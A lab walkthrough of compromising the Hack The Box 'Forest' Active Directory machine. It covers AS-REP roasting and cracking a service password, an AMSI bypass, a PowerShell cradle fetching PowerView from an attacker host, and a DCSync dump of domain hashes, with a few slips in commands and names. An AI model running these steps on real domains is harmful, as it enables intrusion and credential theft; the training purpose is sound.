Pages

Search

HTB Forest

$ forest nmap -T4 -A -p- 10.10.10.161

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 21:04 UTC
Nmap scan report for 10.10.10.161
Host is up (0.023s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-30 21:12:01Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49917/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/30%Time=5FC55E8D%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/30%OT=53%CT=1%CU=37972%PV=Y%DS=2%DC=T%G=Y%TM=5FC55F
OS:A6%P=x86_64-pc-linux-gnu)SEQ(SP=8A%GCD=1%ISR=93%TI=RD%CI=RI%TS=U)OPS(O1=
OS:M5B4W2L%O2=M5B4W2L%O3=M5B4W2L%O4=M5B4W2L%O5=M5B4W2L%O6=M5B4)WIN(W1=FFFF%
OS:W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=27%W=FFFF%O=M5B4W
OS:2L%CC=N%Q=)T1(R=Y%DF=N%T=27%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=N%T=27%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=N%T=27%W=0%S=A%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=N%T=27%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF
OS:=N%T=27%IPL=164%UN=0%RIPL=4801%RID=3F35%RIPCK=I%RUCK=4840%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-11-30T13:14:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-11-30T21:14:33
|_  start_date: 2020-11-30T14:30:15

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.06 ms 172.17.0.1
2   0.28 ms 10.10.10.161

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 339.26 seconds

Open ports:

  • We have an Active Directory LDAP server
  • Domain Controller: htb.local
  • OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  • Domain name: htb.local
  • Forest name: htb.local
  • FQDN: FOREST.htb.local

To start with the box enumeration we can use JXplorer.

JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface.

http://jxplorer.org/

$ sudo apt install jxplorer

  • Domain Controller = FOREST.htb.local
  • Computers = EXCH01.htb.local
  • Employees =
  • Service account = svc-alfresco

We can try to check the Windows global catalogue record and authoritative domain server records to determine domain controller addresses.

$dig @10.10.10.161 -t NS htb.local

; <<>> DiG 9.16.8-Debian <<>> @10.10.10.161 -t NS htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55068
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 0df9375bcbfd08ba (echoed)
;; QUESTION SECTION:
;htb.local.			IN	NS

;; ANSWER SECTION:
htb.local.		3600	IN	NS	forest.htb.local.

;; ADDITIONAL SECTION:
forest.htb.local.	3600	IN	A	10.10.10.161

;; Query time: 36 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: mié dic 02 11:22:35 CET 2020
;; MSG SIZE  rcvd: 87

$dig @10.10.10.161 _gc.htb.local

; <<>> DiG 9.16.8-Debian <<>> @10.10.10.161 _gc.htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42890
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 180b076100c86a7c (echoed)
;; QUESTION SECTION:
;_gc.htb.local.			IN	A

;; AUTHORITY SECTION:
htb.local.		3600	IN	SOA	forest.htb.local. hostmaster.htb.local. 102 900 600 86400 3600

;; Query time: 40 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: mié dic 02 11:23:33 CET 2020
;; MSG SIZE  rcvd: 117

We can also check if RPC client can be used as an anonymous user.
Then we could use https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient to continue the enumeration.

Rpcclient is a tool for executing client side MS-RPC functions.

https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html

$rpcclient -U "" -N 10.10.10.161

`rpcclient $> `

rpcclient $> enumdomusers

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

rpcclient $> enumdomgroups

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

Interesting users found:

  • user:[Administrator] rid:[0x1f4]
  • user:[Guest] rid:[0x1f5]
  • user:[krbtgt] rid:[0x1f6]
  • user:[DefaultAccount] rid:[0x1f7]
  • user:[sebastien] rid:[0x479]
  • user:[lucinda] rid:[0x47a]
  • user:[svc-alfresco] rid:[0x47b]
  • user:[andy] rid:[0x47e]
  • user:[mark] rid:[0x47f]
  • user:[santi] rid:[0x480]

We can check the user’s information:

rpcclient $> queryuser santi

User Name   :	santi
Full Name   :	Santi Rodriguez
Home Drive  :	
Dir Drive   :	
Profile Path:	
Logon Script:	
Description :	
Workstations:	
Comment     :	
Remote Dial :
Logon Time               :	jue, 01 ene 1970 01:00:00 CET
Logoff Time              :	jue, 01 ene 1970 01:00:00 CET
Kickoff Time             :	jue, 14 sep 30828 04:48:05 CEST
Password last set Time   :	sáb, 21 sep 2019 01:02:55 CEST
Password can change Time :	dom, 22 sep 2019 01:02:55 CEST
Password must change Time:	jue, 14 sep 30828 04:48:05 CEST
	unknown_2[0..31]...
user_rid :	0x480
group_rid:	0x201
acb_info :	0x00000210
fields_present:	0x00ffffff
logon_divs:	168
bad_password_count:	0x00000000
logon_count:	0x00000000
padding1[0..7]...
logon_hrs[0..21]...

rpcclient $> queryuser svc-alfresco

User Name   :	svc-alfresco
Full Name   :	svc-alfresco
Home Drive  :	
Dir Drive   :	
Profile Path:	
Logon Script:	
Description :	
Workstations:	
Comment     :	
Remote Dial :
Logon Time               :	mar, 01 dic 2020 16:09:09 CET
Logoff Time              :	jue, 01 ene 1970 01:00:00 CET
Kickoff Time             :	jue, 01 ene 1970 01:00:00 CET
Password last set Time   :	mié, 02 dic 2020 11:42:46 CET
Password can change Time :	jue, 03 dic 2020 11:42:46 CET
Password must change Time:	jue, 14 sep 30828 04:48:05 CEST
	unknown_2[0..31]...
user_rid :	0x47b
group_rid:	0x201
acb_info :	0x00010210
fields_present:	0x00ffffff
logon_divs:	168
bad_password_count:	0x00000000
logon_count:	0x00000007
padding1[0..7]...
logon_hrs[0..21]...

We can check a group’s information:
The Domain Admins group has one member, rid 0x1f4.

rpcclient $> querygroup 0x200

Group Name:    Domain Admins     
Description:    Designated administrators of the domain
Group Attribute:7              
Num Members:1

rpcclient $> querygroupmem 0x200

rid:[0x1f4] attr:[0x7]

That’s the Administrator account:

rpcclient $> queryuser 0x1f4

User Name   :   Administrator
Full Name   :   Administrator
Home Drive  :   
Dir Drive   :      
Profile Path:      
Logon Script:
Description :   Built-in account for administering the computer/domain
Workstations:
Comment     :
Remote Dial :
Logon Time               :      Mon, 07 Oct 2019 06:57:07 EDT
Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
Password last set Time   :      Wed, 18 Sep 2019 13:09:08 EDT
Password can change Time :      Thu, 19 Sep 2019 13:09:08 EDT
Password must change Time:      Wed, 30 Oct 2019 13:09:08 EDT
unknown_2[0..31]...
user_rid :      0x1f4
group_rid:      0x201
acb_info :      0x00000010
fields_present: 0x00ffffff
logon_divs:     168
bad_password_count:     0x00000000
logon_count:    0x00000031
padding1[0..7]...
logon_hrs[0..21]...

From the user list obtained we detect a user svc-alfreso.
This user name implies there is an installation of Alfreso.

Alfresco delivers innovative content management solutions that connect, manage and protect your enterprise’s most important information – wherever it lives.

https://www.alfresco.com/

According to this documentation:

Select the Account tab and enable the Do not require Kerberos preauthentication option in the Account Options section.

https://docs.alfresco.com/process-services1.8/tasks/ps-auth-kerberos-ADconfig.html

As described here (https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) ASREPRoast attack could be performed as it required for users without Kerberos pre-authentication required.

This means that we can request the encrypted TGT for this user.
As the TGT contains material that is encrypted with the user’s NTLMhash, we can subject this to an offline brute force attack.

$python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:4742618e99e53bcd384e283181a0f1a5$342b2edfe3a1c0e035d1bc842ec85882824d21ac352135f6a9bacfcf8651a2747b26b66cd1666e394a812c6bd0b239d07151175ea64eb7026405ae3fdd522002b0b8fb9bb15f72f3a42905f0b26d4600548e0bee8b6c32656bb0933fa2a0bcbba0da21977e9a33b87bcfdac22bb08bcc8a17ec4586278c2a148642b0e6f9d3f3ceb8384c0f70d3d0c0ae88cf5fe977f4068c9059ee1eb6efa9a94f26a28d364dfe7eb5b1e988323965db849158589e3836c8552489e7a01e7e3c0b377273edd592e5f90c1ba796b4851c7cc2933c7259df561859f7427d3ececc6fb742015fab78bc5c79e55c

$hashcat -m 18200 --force alfresco.hash /usr/share/wordlists/rockyou.txt --show

$krb5asrep$23$svc-alfresco@HTB.LOCAL:4742618e99e53bcd384e283181a0f1a5$342b2edfe3a1c0e035d1bc842ec85882824d21ac352135f6a9bacfcf8651a2747b26b66cd1666e394a812c6bd0b239d07151175ea64eb7026405ae3fdd522002b0b8fb9bb15f72f3a42905f0b26d4600548e0bee8b6c32656bb0933fa2a0bcbba0da21977e9a33b87bcfdac22bb08bcc8a17ec4586278c2a148642b0e6f9d3f3ceb8384c0f70d3d0c0ae88cf5fe977f4068c9059ee1eb6efa9a94f26a28d364dfe7eb5b1e988323965db849158589e3836c8552489e7a01e7e3c0b377273edd592e5f90c1ba796b4851c7cc2933c7259df561859f7427d3ececc6fb742015fab78bc5c79e55c:s3rvice

Password is «s3rvice«

As port 5987 is open, we can now use Evil-WinRM.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

https://github.com/Hackplayers/evil-winrm

$sudo gem install evil-winrm

Fetching erubi-1.10.0.gem
Fetching rubyntlm-0.6.2.gem
Fetching builder-3.2.4.gem
Fetching little-plugger-1.1.4.gem
Fetching logging-2.3.0.gem
Fetching gyoku-1.3.1.gem
Fetching nori-2.6.0.gem
Fetching gssapi-1.3.1.gem
Fetching winrm-2.3.5.gem
Fetching evil-winrm-2.3.gem
Fetching winrm-fs-1.3.5.gem
Successfully installed builder-3.2.4
Successfully installed erubi-1.10.0
Successfully installed gssapi-1.3.1
Successfully installed gyoku-1.3.1
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.3.0
Successfully installed nori-2.6.0
Successfully installed rubyntlm-0.6.2
Successfully installed winrm-2.3.5
Successfully installed winrm-fs-1.3.5
Happy hacking! :)
Successfully installed evil-winrm-2.3
Parsing documentation for builder-3.2.4
Installing ri documentation for builder-3.2.4
Parsing documentation for erubi-1.10.0
Installing ri documentation for erubi-1.10.0
Parsing documentation for gssapi-1.3.1
Installing ri documentation for gssapi-1.3.1
Parsing documentation for gyoku-1.3.1
Installing ri documentation for gyoku-1.3.1
Parsing documentation for little-plugger-1.1.4
Installing ri documentation for little-plugger-1.1.4
Parsing documentation for logging-2.3.0
Installing ri documentation for logging-2.3.0
Parsing documentation for nori-2.6.0
Installing ri documentation for nori-2.6.0
Parsing documentation for rubyntlm-0.6.2
Installing ri documentation for rubyntlm-0.6.2
Parsing documentation for winrm-2.3.5
Installing ri documentation for winrm-2.3.5
Parsing documentation for winrm-fs-1.3.5
Installing ri documentation for winrm-fs-1.3.5
Parsing documentation for evil-winrm-2.3
Installing ri documentation for evil-winrm-2.3
Done installing documentation for builder, erubi, gssapi, gyoku, little-plugger, logging, nori, rubyntlm, winrm, winrm-fs, evil-winrm after 3 seconds
11 gems installed

$evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt

e5e4XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now that we have the user’s flag we need to get our root’s one.

As we are in a WIN AD system, our best option is Bloodhound to enumerate all the system.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

https://github.com/BloodHoundAD/BloodHound

To run properly, we need to pass all the data collected from the target system. This process is performed with a Bloodhound data collector.

https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html

https://bloodhound.readthedocs.io/en/latest/data-collection/bloodhound-py.html

$pip install bloodhound

Collecting bloodhound
  Downloading bloodhound-1.0.5-py3-none-any.whl (65 kB)
     |████████████████████████████████| 65 kB 782 kB/s 
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python3/dist-packages (from bloodhound) (0.9.21)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from bloodhound) (2.7)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from bloodhound) (0.18.2)
Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from bloodhound) (2.0.0)
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python3/dist-packages (from bloodhound) (0.4.8)
Installing collected packages: bloodhound
Successfully installed bloodhound-1.0.5

$bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -c all -ns 10.10.10.161

INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 75 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 33S

$ls *.json

computers.json  domains.json  groups.json  users.json

Now let’s install the Bloodhound Gui.

$sudo apt install neo4j

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes NUEVOS:
  neo4j
0 actualizados, 1 nuevos se instalarán, 0 para eliminar y 1 no actualizados.
Se necesita descargar 103 MB de archivos.
Se utilizarán 117 MB de espacio de disco adicional después de esta operación.
Des:1 https://ftp-stud.hs-esslingen.de/Mirrors/archive.parrotsec.org rolling/main amd64 neo4j all 4.0.7-0kali2 [103 MB]
Descargados 103 MB en 11s (9.621 kB/s)                                                          
Seleccionando el paquete neo4j previamente no seleccionado.
(Leyendo la base de datos ... 444501 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../neo4j_4.0.7-0kali2_all.deb ...
Desempaquetando neo4j (4.0.7-0kali2) ...
Configurando neo4j (4.0.7-0kali2) ...
Scanning application launchers
Removing duplicate launchers from Debian
Launchers are updated

$sudo apt install bloodhound

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes NUEVOS:
  bloodhound
0 actualizados, 1 nuevos se instalarán, 0 para eliminar y 1 no actualizados.
Se necesita descargar 63,4 MB de archivos.
Se utilizarán 268 MB de espacio de disco adicional después de esta operación.
Des:1 https://ftp.nluug.nl/os/Linux/distr/parrot rolling/main amd64 bloodhound amd64 3.0.5-0kali1 [63,4 MB]
Descargados 63,4 MB en 10s (6.138 kB/s)                                                                                                                             Seleccionando el paquete bloodhound previamente no seleccionado.
(Leyendo la base de datos ... 444668 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../bloodhound_3.0.5-0kali1_amd64.deb ...
Desempaquetando bloodhound (3.0.5-0kali1) ...
Configurando bloodhound (3.0.5-0kali1) ...
Scanning application launchers
Removing duplicate launchers from Debian
Launchers are updated

$sudo neo4j console

Directories in use:
  home:         /usr/share/neo4j
  config:       /usr/share/neo4j/conf
  logs:         /usr/share/neo4j/logs
  plugins:      /usr/share/neo4j/plugins
  import:       /usr/share/neo4j/import
  data:         /usr/share/neo4j/data
  certificates: /usr/share/neo4j/certificates
  run:          /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2020-12-02 15:02:10.263+0000 INFO  ======== Neo4j 4.0.7 ========
2020-12-02 15:02:10.277+0000 INFO  Starting...
2020-12-02 15:02:19.712+0000 INFO  Bolt enabled on localhost:7687.
2020-12-02 15:02:19.714+0000 INFO  Started.
2020-12-02 15:02:22.404+0000 INFO  Remote interface available at http://localhost:7474/

On the first run, use credentials neo4j/neo4j.

Then you’ll need to update your Neo4j password.

$ bloodhound --no-sandbox

Import your *.json files.

Searching for svc-alfresco user:

We can see that this user is a member of 9 groups, one of them is Account Operators, which is a privileged AD group.

The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators

Using the query Shortest Path to High-Value targets:

Exchange Windows Permissions group has WriteDacl privileges on the Domain.

WriteDACL: Provides the ability to modify security on an object which can lead to Full Control of the object.
The right to modify the DACL in the object security descriptor.
Example: A service account may be granted this right to perform delegation in AD. If an attacker can guess this password (or potentially crack it by Kerberoasting), they now set their own permissions on associated objects which can lead to Full Control of an object which may involve exposure of a LAPS controlled local Administrator password.

https://adsecurity.org/?p=3658

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

$evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

[+] Bypass-4MSI 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

[+] Patched! :D

The Bypass-4MSI command is used to evade defender before importing the script.

Next, we can use the Add-ObjectACL with john’s credentials and give him DCSync rights.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pep 1234567 /add /domain

The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" pep /add

The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" pep /add

The command completed successfully.

Evil-WinRM PS C:\Users\svc-alfresco\Documents> iex(new-object net.webclient).downloadstring("http://10.10.14.15:8080/PowerView.ps1")
Evil-WinRM PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring "1234567" -asplain -force
Evil-WinRM PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity pep -Credential $cred -Rights DCSync

$python3 /usr/share/doc/python3-impacket/examples/secretsdump.py htb/pep@10.10.10.161

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
